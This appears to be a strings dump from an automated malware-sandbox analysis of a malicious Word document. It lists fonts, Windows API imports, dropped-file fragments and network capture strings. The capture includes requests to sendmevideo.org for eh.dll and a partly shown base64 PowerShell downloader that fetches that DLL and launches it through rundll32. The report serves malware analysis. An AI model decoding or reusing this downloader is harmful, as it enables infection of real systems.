Unicode based on Runtime Data (WINWORD.EXE )

Copperplate Gothic Bold

Unicode based on Runtime Data (WINWORD.EXE )

Copperplate Gothic Light

Unicode based on Runtime Data (WINWORD.EXE )

Corbel

Unicode based on Runtime Data (WINWORD.EXE )

Cordia New

Unicode based on Runtime Data (WINWORD.EXE )

CordiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Courier New

Unicode based on Runtime Data (WINWORD.EXE )

CreateDirectoryW

Ansi based on PCAP Processing (network.pcap)

CreateFileMappingA

Ansi based on PCAP Processing (network.pcap)

CreateFileW

Ansi based on PCAP Processing (network.pcap)

CreateMutexA

Ansi based on PCAP Processing (network.pcap)

CreateRemoteThread

Ansi based on PCAP Processing (network.pcap)

CreateThread

Ansi based on PCAP Processing (network.pcap)

CreateToolhelp32Snapshot

Ansi based on PCAP Processing (network.pcap)

CRYPT32.dll

Ansi based on PCAP Processing (network.pcap)

CryptBinaryToStringA

Ansi based on PCAP Processing (network.pcap)

CryptStringToBinaryA

Ansi based on PCAP Processing (network.pcap)

CryptSvc

Unicode based on Runtime Data (rundll32.exe )

cryptsvc

Unicode based on Runtime Data (rundll32.exe )

Curlz MT

Unicode based on Runtime Data (WINWORD.EXE )

d%HT`r-S8d%w=d[Zh-BFU4n~]:_z0vRwq!<dqGvvrk

Ansi based on Dropped File (~WRD0000.tmp)

D;%4L<#laPR:

Ansi based on PCAP Processing (network.pcap)

DaunPenh

Unicode based on Runtime Data (WINWORD.EXE )

David

Unicode based on Runtime Data (WINWORD.EXE )

DefaultConnectionSettings

Unicode based on Runtime Data (rundll32.exe )

DeleteFileW

Ansi based on PCAP Processing (network.pcap)

developer.android.google.cn

Ansi based on PCAP Processing (network.pcap)

developers.android.google.cn

Ansi based on PCAP Processing (network.pcap)

DFKai-SB

Unicode based on Runtime Data (WINWORD.EXE )

DGMNOEP

Ansi based on Dropped File (carved_0.dll.1509628513544)

DilleniaUPC

Unicode based on Runtime Data (WINWORD.EXE )

DisableThreadLibraryCalls

Ansi based on PCAP Processing (network.pcap)

DispatchMessageA

Ansi based on PCAP Processing (network.pcap)

dO3x\BoX

Ansi based on PCAP Processing (network.pcap)

DokChampa

Unicode based on Runtime Data (WINWORD.EXE )

Dotum

Unicode based on Runtime Data (WINWORD.EXE )

DotumChe

Unicode based on Runtime Data (WINWORD.EXE )

downloadwindowsupdate

Ansi based on PCAP Processing (network.pcap)

DZf|V.SR'H&.5SXS5tH.KbDytNH/9(12{g%?

Ansi based on Dropped File (~WRD0000.tmp)

e9:(H$.7E

Ansi based on PCAP Processing (network.pcap)

e?OQ&B/v

Ansi based on Dropped File (carved_0.dll.1509628513544)

e_e'_

Ansi based on Image Processing (screen_6.png)

Ebrima

Unicode based on Runtime Data (WINWORD.EXE )

Edwardian Script ITC

Unicode based on Runtime Data (WINWORD.EXE )

Elephant

Unicode based on Runtime Data (WINWORD.EXE )

en-US

Unicode based on Runtime Data (rundll32.exe )

Engravers MT

Unicode based on Runtime Data (WINWORD.EXE )

Equifax1-0+

Ansi based on PCAP Processing (network.pcap)

Eras Bold ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Demi ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Light ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Medium ITC

Unicode based on Runtime Data (WINWORD.EXE )

Estrangelo Edessa

Unicode based on Runtime Data (WINWORD.EXE )

EucrosiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Euphemia

Unicode based on Runtime Data (WINWORD.EXE )

eWZgpFj&

Ansi based on PCAP Processing (network.pcap)

E{j3OMWrk

Ansi based on PCAP Processing (network.pcap)

FangSong

Unicode based on Runtime Data (WINWORD.EXE )

fao.b*lIrj),l0%b

Ansi based on Dropped File (~WRD0000.tmp)

fC7:`FiHP=n) 0mT5

Ansi based on PCAP Processing (network.pcap)

Felix Titling

Unicode based on Runtime Data (WINWORD.EXE )

FileDescription

Unicode based on Dropped File (carved_0.dll.1509628513544)

FileVersion

Unicode based on Dropped File (carved_0.dll.1509628513544)

Footlight MT Light

Unicode based on Runtime Data (WINWORD.EXE )

FOrmatPaintir

Ansi based on Image Processing (screen_3.png)

Forte

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Book

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Demi

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Demi Cond

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Heavy

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Medium

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Medium Cond

Unicode based on Runtime Data (WINWORD.EXE )

FrankRuehl

Unicode based on Runtime Data (WINWORD.EXE )

FreeLibrary

Ansi based on PCAP Processing (network.pcap)

FreesiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Freestyle Script

Unicode based on Runtime Data (WINWORD.EXE )

French Script MT

Unicode based on Runtime Data (WINWORD.EXE )

Ft#6"w9:0t[E[?N1~piMPir1/C4^C,_R&+Hd\CBwPV*h"|x0gV5iy$4V"e9BA)jT(y>vwv(SLqWUDXQw4S^0F"\gsldYdLuHc9>(hVD5{A7tPK!N_rels/.rels (JAa}7

Ansi based on Dropped File (~WRD0000.tmp)

fydGdxRicheGdx

Ansi based on PCAP Processing (network.pcap)

g$mg49z'c'Yy&h-]IB[nxG!!i[1dsjT"5U$Z,K_M-sdC""h`#BE=x56f}P^Hjl9*T`<Oy`#@P~x2d$6dy%t@`'ut|+{{W>d7\iIv

Ansi based on Dropped File (~WRD0000.tmp)

g/ox(-R,vj,'I8M8M#8M

Ansi based on Dropped File (~WRD0000.tmp)

G_)Ew_9_8]ROu!}=I]?re

Ansi based on Dropped File (~WRD0000.tmp)

g_u__xx_,r_\_6

Ansi based on Image Processing (screen_6.png)

Gabriola

Unicode based on Runtime Data (WINWORD.EXE )

Garamond

Unicode based on Runtime Data (WINWORD.EXE )

Gautami

Unicode based on Runtime Data (WINWORD.EXE )

GdipAlloc

Ansi based on PCAP Processing (network.pcap)

GdipCloneImage

Ansi based on PCAP Processing (network.pcap)

GdipCreateBitmapFromHBITMAP

Ansi based on PCAP Processing (network.pcap)

GdipDisposeImage

Ansi based on PCAP Processing (network.pcap)

GdipFree

Ansi based on Dropped File (carved_0.dll.1509628513544)

GdipGetImageEncoders

Ansi based on PCAP Processing (network.pcap)

GdipGetImageEncodersSize

Ansi based on PCAP Processing (network.pcap)

gdiplus.dll

Ansi based on PCAP Processing (network.pcap)

GdiplusShutdown

Ansi based on PCAP Processing (network.pcap)

GdiplusStartup

Ansi based on PCAP Processing (network.pcap)

GdipSaveImageToStream

Ansi based on PCAP Processing (network.pcap)

Georgia

Unicode based on Runtime Data (WINWORD.EXE )

GeoTrust Global CA0

Ansi based on PCAP Processing (network.pcap)

GeoTrust Inc.1

Ansi based on PCAP Processing (network.pcap)

GET /dh2025e/eee.txt HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive

Ansi based on PCAP Processing (network.pcap)

GET /dh2025e/eh.dll HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive!

Ansi based on PCAP Processing (network.pcap)

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1Cache-Control: max-age = 86405Connection: Keep-AliveAccept: */*If-Modified-Since: Sat, 12 Nov 2016 01:34:12 GMTIf-None-Match: "02e4de843cd21:0"User-Agent: Microsoft-CryptoAPI/6.1Host: www.download.windowsupdate.com0

Ansi based on PCAP Processing (network.pcap)

GetAdaptersAddresses

Ansi based on PCAP Processing (network.pcap)

GetCurrentProcess

Ansi based on PCAP Processing (network.pcap)

GetExitCodeP!

Ansi based on PCAP Processing (network.pcap)

GetExitCodeProcess

Ansi based on Dropped File (carved_0.dll.1509628513544)

GetExitCodeThread

Ansi based on PCAP Processing (network.pcap)

GetFileSize

Ansi based on PCAP Processing (network.pcap)

GetLastError

Ansi based on PCAP Processing (network.pcap)

GetMessageA

Ansi based on PCAP Processing (network.pcap)

GetModuleHandleA

Ansi based on PCAP Processing (network.pcap)

GetPrivateProfileStringW

Ansi based on PCAP Processing (network.pcap)

GetProcAddress

Ansi based on PCAP Processing (network.pcap)

GetProcessHeap

Ansi based on PCAP Processing (network.pcap)

GetSystemInfo

Ansi based on PCAP Processing (network.pcap)

GetSystemMetrics

Ansi based on PCAP Processing (network.pcap)

GetSystemTimeAsFileTime

Ansi based on PCAP Processing (network.pcap)

GetTickCount

Ansi based on PCAP Processing (network.pcap)

GetVersionExA

Ansi based on PCAP Processing (network.pcap)

GetVolumeInformationW

Ansi based on PCAP Processing (network.pcap)

gI$vV~ST

Ansi based on PCAP Processing (network.pcap)

Gill Sans MT

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans MT Ext Condensed Bold

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans Ultra Bold

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans Ultra Bold Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Gino/<<1A$>"f3\TISWY

Ansi based on Dropped File (~WRD0000.tmp)

Gisha

Unicode based on Runtime Data (WINWORD.EXE )

Gloucester MT Extra Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Google Inc1

Ansi based on PCAP Processing (network.pcap)

Google Inc1%0#

Ansi based on PCAP Processing (network.pcap)

Google Internet Authority G20

Ansi based on PCAP Processing (network.pcap)

google-analytics.com

Ansi based on PCAP Processing (network.pcap)

google.com

Ansi based on PCAP Processing (network.pcap)

googlecommerce.com

Ansi based on PCAP Processing (network.pcap)

Goudy Old Style

Unicode based on Runtime Data (WINWORD.EXE )

Goudy Stout

Unicode based on Runtime Data (WINWORD.EXE )

gpsvc

Unicode based on Runtime Data (rundll32.exe )

Gulim

Unicode based on Runtime Data (WINWORD.EXE )

GulimChe

Unicode based on Runtime Data (WINWORD.EXE )

Gungsuh

Unicode based on Runtime Data (WINWORD.EXE )

GungsuhChe

Unicode based on Runtime Data (WINWORD.EXE )

h%IX`/*CQGw@(

Ansi based on Dropped File (~WRD0000.tmp)

h8:Bw^y5,X1Nh0`}y[eym/JDr8M)K-2}u>>uSj:7"Ff9b]sXvT)@6zKjRz}O\

Ansi based on Dropped File (~WRD0000.tmp)

h['!#EeF+Y-FWmfDPjMZ/}o"X-]=GUMEUoDD74x#@74\!7EUF+?XPU 6+fT=m#7BNPSrvP*R`#8#8#p'YV"UPaxUA!')

Ansi based on Dropped File (~WRD0000.tmp)

h_ailing_

Ansi based on Image Processing (screen_3.png)

Haettenschweiler

Unicode based on Runtime Data (WINWORD.EXE )

hangg

Ansi based on Image Processing (screen_6.png)

Harlow Solid Italic

Unicode based on Runtime Data (WINWORD.EXE )

Harrington

Unicode based on Runtime Data (WINWORD.EXE )

HeapAlloc

Ansi based on PCAP Processing (network.pcap)

HeapFree

Ansi based on Dropped File (carved_0.dll.1509628513544)

HeapReAlloc

Ansi based on PCAP Processing (network.pcap)

Hgad._nLHgad._n_

Ansi based on Image Processing (screen_6.png)

High Tower Text

Unicode based on Runtime Data (WINWORD.EXE )

HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 11:35:21 GMTContent-Type: application/vnd.ms-cab-compressedContent-Length: 53978Connection: keep-aliveCache-Control: max-age=604800ETag: "014e8acee33d31:0"Expires: Tue, 07 Nov 2017 11:35:20 GMTLast-Modified: Fri, 22 Sep 2017 22:03:52 GMTServer: Microsoft-IIS/8.5MSRegion: EMEAx-ccc: FRx-cid: 3X-Powered-By: ASP.NETAge: 5687Accept-Ranges: bytesMSCF

Ansi based on PCAP Processing (network.pcap)

HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 13:09:40 GMTServer: Apache/2.4.6 (CentOS)Last-Modified: Tue, 31 Oct 2017 12:13:53 GMTETag: "7f0-55cd6b0447ebb"Accept-Ranges: bytesContent-Length: 2032Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/plain; charset=UTF-8JABXAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAHAAPQAoACQARQBuAHYAOgBBAEwATABVAFMARQBSAFMAUABSAE8ARgBJAEwARQArACIAXABtAHYAZAByAHQALgBkAGwAbAAiACkAOwANAAoAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7AA0ACgAkAFcALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBzAGUAbgBkAG0AZQB2AGkAZABlAG8ALgBvAHIAZwAvAGQAaAAyADAAMgA1AGUALwBlAGgALgBkAGwAbAAiACwAJABwACkAOwANAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcAApAHsADQAKACQAcgBkAF8AcAA9ACQARQBuAHYAOgBTAFkAUwBUAEUATQBSAE8ATwBUACsAIgBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIAOwANAAoAJABwAF8AYQA9ACQAcAArACIALAAjADEAIgA7AA0ACgAkAHAAcgA9AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAHIAZABfAHAAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABwAF8AYQA7AA0ACgAkAHAAXwBiAGEAdAA9ACgAJABFAG4AdgA6AEEATABMAFUAUwBFAFIAUwBQAFIATwBGAEkATABFACsAIgBcAG0AdgBkAHIAdAAuAGIAYQB0ACIAKQA7AA0ACgAkAHQAZQB4AHQAPQAnAHMAZQB0ACAAaQBuAHMAdABfAHAAYwBrACAAPQAgACIAJQBBAEwATABVAFMARQBSAFMAUABSAE8ARgBJAEw

Ansi based on PCAP Processing (network.pcap)

HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 13:09:46 GMTServer: Apache/2.4.6 (CentOS)Last-Modified: Tue, 31 Oct 2017 13:16:40 GMTETag: "7e00-55cd790d0d6eb"Accept-Ranges: bytesContent-Length: 32256Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamMZ

Ansi based on PCAP Processing (network.pcap)

http://clients1.google.com/ocsp0

Ansi based on PCAP Processing (network.pcap)

http://g.symcd.com0

Ansi based on PCAP Processing (network.pcap)

http://pki.google.com/GIAG2.crl0

Ansi based on PCAP Processing (network.pcap)

http://pki.google.com/GIAG2.crt0+

Ansi based on PCAP Processing (network.pcap)

HttpOpenRequestA

Ansi based on PCAP Processing (network.pcap)

HttpQueryInfoA

Ansi based on PCAP Processing (network.pcap)

HttpSendRequestA

Ansi based on PCAP Processing (network.pcap)

HVPxH

Ansi based on Dropped File (carved_0.dll.1509628513544)

i../*,5zXz+ /0,TE^tw7fYEsKwH:EaO||ewV)QKQHzpd#p]y"j^}>)0d^Vwuo?fa>[U`(U}}I+

Ansi based on Dropped File (~WRD0000.tmp)

IETldDllVersionHigh

Unicode based on Runtime Data (rundll32.exe )

IETldDllVersionLow

Unicode based on Runtime Data (rundll32.exe )

IETldVersionHigh

Unicode based on Runtime Data (rundll32.exe )

IETldVersionLow

Unicode based on Runtime Data (rundll32.exe )

if NOT exist %inst_pck % (exit)

Ansi based on Dropped File (mvdrt.bat)

ig@X6_]7~

Ansi based on Dropped File (~WRD0000.tmp)

iginalFilename

Unicode based on Dropped File (carved_0.dll.1509628513544)

iK"4PLp<9SZ|c

Ansi based on PCAP Processing (network.pcap)

image/jpeg

Unicode based on Dropped File (carved_0.dll.1509628513544)

Impact

Unicode based on Runtime Data (WINWORD.EXE )

Imprint MT Shadow

Unicode based on Runtime Data (WINWORD.EXE )

In_ek

Ansi based on Image Processing (screen_3.png)

In_ik

Ansi based on Image Processing (screen_6.png)

in_rnet_nne_an,

Ansi based on Image Processing (screen_3.png)

Informal Roman

Unicode based on Runtime Data (WINWORD.EXE )

InternalName

Unicode based on Dropped File (carved_0.dll.1509628513544)

InternetCloseHandle

Ansi based on PCAP Processing (network.pcap)

InternetConnectA

Ansi based on PCAP Processing (network.pcap)

InternetOpenA

Ansi based on PCAP Processing (network.pcap)

InternetQueryOptionA

Ansi based on PCAP Processing (network.pcap)

InternetReadFile

Ansi based on PCAP Processing (network.pcap)

InternetSetOptionA

Ansi based on PCAP Processing (network.pcap)

IntranetName

Unicode based on Runtime Data (WINWORD.EXE )

IPHLPAPI.DLL

Ansi based on PCAP Processing (network.pcap)

IrisUPC

Unicode based on Runtime Data (WINWORD.EXE )

Iskoola Pota

Unicode based on Runtime Data (WINWORD.EXE )

IsWow64Process

Ansi based on PCAP Processing (network.pcap)

iT&F~J~NV f<

Ansi based on PCAP Processing (network.pcap)

Item 1

Unicode based on Runtime Data (WINWORD.EXE )

Item 10

Unicode based on Runtime Data (WINWORD.EXE )

Item 11

Unicode based on Runtime Data (WINWORD.EXE )

Item 12

Unicode based on Runtime Data (WINWORD.EXE )

Item 13

Unicode based on Runtime Data (WINWORD.EXE )

Item 14

Unicode based on Runtime Data (WINWORD.EXE )

Item 15

Unicode based on Runtime Data (WINWORD.EXE )

Item 16

Unicode based on Runtime Data (WINWORD.EXE )

Item 17

Unicode based on Runtime Data (WINWORD.EXE )

Item 18

Unicode based on Runtime Data (WINWORD.EXE )

Item 19

Unicode based on Runtime Data (WINWORD.EXE )

Item 2

Unicode based on Runtime Data (WINWORD.EXE )

Item 20

Unicode based on Runtime Data (WINWORD.EXE )

Item 21

Unicode based on Runtime Data (WINWORD.EXE )

Item 22

Unicode based on Runtime Data (WINWORD.EXE )

Item 23

Unicode based on Runtime Data (WINWORD.EXE )

Item 24

Unicode based on Runtime Data (WINWORD.EXE )

Item 25

Unicode based on Runtime Data (WINWORD.EXE )

Item 26

Unicode based on Runtime Data (WINWORD.EXE )

Item 27

Unicode based on Runtime Data (WINWORD.EXE )

Item 28

Unicode based on Runtime Data (WINWORD.EXE )

Item 29

Unicode based on Runtime Data (WINWORD.EXE )

Item 3

Unicode based on Runtime Data (WINWORD.EXE )

Item 30

Unicode based on Runtime Data (WINWORD.EXE )

Item 31

Unicode based on Runtime Data (WINWORD.EXE )

Item 32

Unicode based on Runtime Data (WINWORD.EXE )

Item 33

Unicode based on Runtime Data (WINWORD.EXE )

Item 34

Unicode based on Runtime Data (WINWORD.EXE )

Item 35

Unicode based on Runtime Data (WINWORD.EXE )

Item 36

Unicode based on Runtime Data (WINWORD.EXE )

Item 37

Unicode based on Runtime Data (WINWORD.EXE )

Item 38

Unicode based on Runtime Data (WINWORD.EXE )

Item 39

Unicode based on Runtime Data (WINWORD.EXE )

Item 4

Unicode based on Runtime Data (WINWORD.EXE )

Item 40

Unicode based on Runtime Data (WINWORD.EXE )

Item 41

Unicode based on Runtime Data (WINWORD.EXE )

Item 42

Unicode based on Runtime Data (WINWORD.EXE )

Item 43

Unicode based on Runtime Data (WINWORD.EXE )

Item 44

Unicode based on Runtime Data (WINWORD.EXE )

Item 45

Unicode based on Runtime Data (WINWORD.EXE )

Item 46

Unicode based on Runtime Data (WINWORD.EXE )

Item 47

Unicode based on Runtime Data (WINWORD.EXE )

Item 48

Unicode based on Runtime Data (WINWORD.EXE )

Item 49

Unicode based on Runtime Data (WINWORD.EXE )

Item 5

Unicode based on Runtime Data (WINWORD.EXE )

Item 50

Unicode based on Runtime Data (WINWORD.EXE )

Item 6

Unicode based on Runtime Data (WINWORD.EXE )

Item 7

Unicode based on Runtime Data (WINWORD.EXE )

Item 8

Unicode based on Runtime Data (WINWORD.EXE )

Item 9

Unicode based on Runtime Data (WINWORD.EXE )

iv_RiplaCiP

Ansi based on Image Processing (screen_6.png)

j Xj%^j2Z

Ansi based on PCAP Processing (network.pcap)

j%^j Xj2Z

Ansi based on PCAP Processing (network.pcap)

J(6-!FnBPFb2y(R1"I2OxfT#L

Ansi based on Dropped File (~WRD0000.tmp)

j.dR?(QxP3'J5$4v~^W=)~-}"!E?~BT5+

Ansi based on Dropped File (~WRD0000.tmp)

j.k#g,yw}*B.KO*/bUg+LO}/,zp 3j@@8*thox9cxpaA3j.p'M18nt}ynTT<91E#z[4E#Gz[4RE#z[4pv

Ansi based on Dropped File (~WRD0000.tmp)

JasmineUPC

Unicode based on Runtime Data (WINWORD.EXE )

JmoLzc<qhcN2zoa9+T-f6:Gbn~JqT[w<,97zNHs

Ansi based on Dropped File (~WRD0000.tmp)

Jokerman

Unicode based on Runtime Data (WINWORD.EXE )

jPYjrXjof

Ansi based on PCAP Processing (network.pcap)

Juice ITC

Unicode based on Runtime Data (WINWORD.EXE )

Jv_uPK!Nword/webSettings.xmlJ1;,"t R"ivvdLjOo ^z$@_f^

Ansi based on Dropped File (~WRD0000.tmp)

jw@cO9h!m

Ansi based on PCAP Processing (network.pcap)

K@Nm}/k

Ansi based on Dropped File (~WRD0000.tmp)

KaiTi

Unicode based on Runtime Data (WINWORD.EXE )

Kalinga

Unicode based on Runtime Data (WINWORD.EXE )

Kartika

Unicode based on Runtime Data (WINWORD.EXE )

KERNEL32.dll

Ansi based on PCAP Processing (network.pcap)

Khmer UI

Unicode based on Runtime Data (WINWORD.EXE )

KIv%[Yz)kY

Ansi based on PCAP Processing (network.pcap)

KJ*jQL|N]

Ansi based on PCAP Processing (network.pcap)

KodchiangUPC

Unicode based on Runtime Data (WINWORD.EXE )

Kokila

Unicode based on Runtime Data (WINWORD.EXE )

Kristen ITC

Unicode based on Runtime Data (WINWORD.EXE )

Kunstler Script

Unicode based on Runtime Data (WINWORD.EXE )

KvGDun

Ansi based on Dropped File (~WRD0000.tmp)

l_____:,_---_---_

Ansi based on Image Processing (screen_3.png)

la_r.

Ansi based on Image Processing (screen_3.png)

LanguageList

Unicode based on Runtime Data (rundll32.exe )

Lao UI

Unicode based on Runtime Data (WINWORD.EXE )

LastPurgeTime

Unicode based on Runtime Data (WINWORD.EXE )

Latha

Unicode based on Runtime Data (WINWORD.EXE )

lc-lZQrRT6g./

Ansi based on PCAP Processing (network.pcap)

Leelawadee

Unicode based on Runtime Data (WINWORD.EXE )

LegalCopyright

Unicode based on Dropped File (carved_0.dll.1509628513544)

Levenim MT

Unicode based on Runtime Data (WINWORD.EXE )

lGawh'QwS

Ansi based on PCAP Processing (network.pcap)

LilyUPC

Unicode based on Runtime Data (WINWORD.EXE )

LoadLibraryA

Ansi based on PCAP Processing (network.pcap)

LoadLibraryW

Ansi based on PCAP Processing (network.pcap)

lstrcmpiA

Ansi based on PCAP Processing (network.pcap)

lstrlenA

Ansi based on Dropped File (carved_0.dll.1509628513544)

lstrlenW

Ansi based on Dropped File (carved_0.dll.1509628513544)

Lucida Bright

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Calligraphy

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Console

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Fax

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Handwriting

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans Typewriter

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans Unicode

Unicode based on Runtime Data (WINWORD.EXE )

LUl\$^U@UO^"9Ac |K`z'r{Wi/}.'26&g\U&|qJvVPK!uwvdocProps/app.xml (RN0#QPPKj

Ansi based on Dropped File (~WRD0000.tmp)

LvVxJO<?d^YZXaTtC@^1M *#Y0^:XtX+Ix!8q{z]!cZPS"*V<m0&-<nj*4=evc,nk

Ansi based on Dropped File (~WRD0000.tmp)

M]D/Qs2a0

Ansi based on PCAP Processing (network.pcap)

Magneto

Unicode based on Runtime Data (WINWORD.EXE )

Mai_ing_

Ansi based on Image Processing (screen_6.png)

Maiandra GD

Unicode based on Runtime Data (WINWORD.EXE )

Malgun Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Mangal

Unicode based on Runtime Data (WINWORD.EXE )

MapViewOfFile

Ansi based on PCAP Processing (network.pcap)

Marlett

Unicode based on Runtime Data (WINWORD.EXE )

Matura MT Script Capitals

Unicode based on Runtime Data (WINWORD.EXE )

MaV7lULoIT};>

Ansi based on PCAP Processing (network.pcap)

Max Display

Unicode based on Runtime Data (WINWORD.EXE )

mB,oQOx<9SZ|c

Ansi based on PCAP Processing (network.pcap)

Meiryo

Unicode based on Runtime Data (WINWORD.EXE )

Meiryo UI

Unicode based on Runtime Data (WINWORD.EXE )

MH_Ward

Ansi based on Image Processing (screen_3.png)

micr0c0ftw0rd

Ansi based on Image Processing (screen_6.png)

Microsoft Himalaya

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft JhengHei

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft New Tai Lue

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft PhagsPa

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Sans Serif

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Tai Le

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Uighur

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft YaHei

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Yi Baiti

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU_HKSCS

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU_HKSCS-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Miriam

Unicode based on Runtime Data (WINWORD.EXE )

Miriam Fixed

Unicode based on Runtime Data (WINWORD.EXE )

Mistral

Unicode based on Runtime Data (WINWORD.EXE )

Modern No. 20

Unicode based on Runtime Data (WINWORD.EXE )

Mongolian Baiti

Unicode based on Runtime Data (WINWORD.EXE )

Monotype Corsiva

Unicode based on Runtime Data (WINWORD.EXE )

MoolBoran

Unicode based on Runtime Data (WINWORD.EXE )

Mountain View1

Ansi based on PCAP Processing (network.pcap)

MS Gothic

Unicode based on Runtime Data (WINWORD.EXE )

MS Mincho

Unicode based on Runtime Data (WINWORD.EXE )

MS Outlook

Unicode based on Runtime Data (WINWORD.EXE )

MS PGothic

Unicode based on Runtime Data (WINWORD.EXE )

MS PMincho

Unicode based on Runtime Data (WINWORD.EXE )

MS Reference Sans Serif

Unicode based on Runtime Data (WINWORD.EXE )

MS Reference Specialty

Unicode based on Runtime Data (WINWORD.EXE )

MS UI Gothic

Unicode based on Runtime Data (WINWORD.EXE )

MSOBALLOON

Unicode based on Runtime Data (WINWORD.EXE )

MsoHelp10

Unicode based on Runtime Data (WINWORD.EXE )

mspim_wnd32

Unicode based on Runtime Data (WINWORD.EXE )

MT Extra

Unicode based on Runtime Data (WINWORD.EXE )

mu7hVBpsW

Ansi based on PCAP Processing (network.pcap)

MultiByteToWideChar

Ansi based on PCAP Processing (network.pcap)

MV Boli

Unicode based on Runtime Data (WINWORD.EXE )

mv1uPFnOn

Ansi based on PCAP Processing (network.pcap)

Narkisim

Unicode based on Runtime Data (WINWORD.EXE )

nector

Unicode based on Dropped File (carved_0.dll.1509628513544)

Network

Unicode based on Runtime Data (rundll32.exe )

NextUpdate

Unicode based on Runtime Data (WINWORD.EXE )

Niagara Engraved

Unicode based on Runtime Data (WINWORD.EXE )

Niagara Solid

Unicode based on Runtime Data (WINWORD.EXE )

nNorma_nNosaci

Ansi based on Image Processing (screen_6.png)

NSimSun

Unicode based on Runtime Data (WINWORD.EXE )

Nyala

Unicode based on Runtime Data (WINWORD.EXE )

O,CtU$Wq:h2]$}|z%jo4>6]>b>M8M2_f}u=fJ7lkO

Ansi based on Dropped File (~WRD0000.tmp)

o__0_

Ansi based on Image Processing (screen_3.png)

OCR A Extended

Unicode based on Runtime Data (WINWORD.EXE )

oductVersion

Unicode based on Dropped File (carved_0.dll.1509628513544)

Old English Text MT

Unicode based on Runtime Data (WINWORD.EXE )

ompany

Unicode based on Dropped File (carved_0.dll.1509628513544)

OpenFileMappingA

Ansi based on PCAP Processing (network.pcap)

PageLayaut

Ansi based on Image Processing (screen_3.png)

PagiLayaut

Ansi based on Image Processing (screen_6.png)

Palace Script MT

Unicode based on Runtime Data (WINWORD.EXE )

Palatino Linotype

Unicode based on Runtime Data (WINWORD.EXE )

Papyrus

Unicode based on Runtime Data (WINWORD.EXE )

Paragraph

Ansi based on Image Processing (screen_6.png)

Parchment

Unicode based on Runtime Data (WINWORD.EXE )

Patte

Ansi based on Image Processing (screen_3.png)

Perpetua

Unicode based on Runtime Data (WINWORD.EXE )

Perpetua Titling MT

Unicode based on Runtime Data (WINWORD.EXE )

Pi]M&zZ|c

Ansi based on PCAP Processing (network.pcap)

PK!$[Content_Types].xml (MO@&Wz0M.C~dgJKZ23J<*kROz,#m,eEDi

Ansi based on Dropped File (~WRD0000.tmp)

PK-!$[Content_Types].xmlPK-!N_rels/.relsPK-!|;9"word/_rels/document.xml.relsPK-!yUBword/document.xmlPK-!/]N word/theme/theme1.xmlPK-!5Iword/settings.xmlPK-!Nword/webSettings.xmlPK-!To^=word/stylesWithEffects.xmlPK-!=lgt!docProps/core.xmlPK-!e:)?m:U$word/styles.xmlPK-!EOM+word/fontTable.xmlPK-!uwv-docProps/app.xmlPKb0

Ansi based on Dropped File (~WRD0002.tmp)

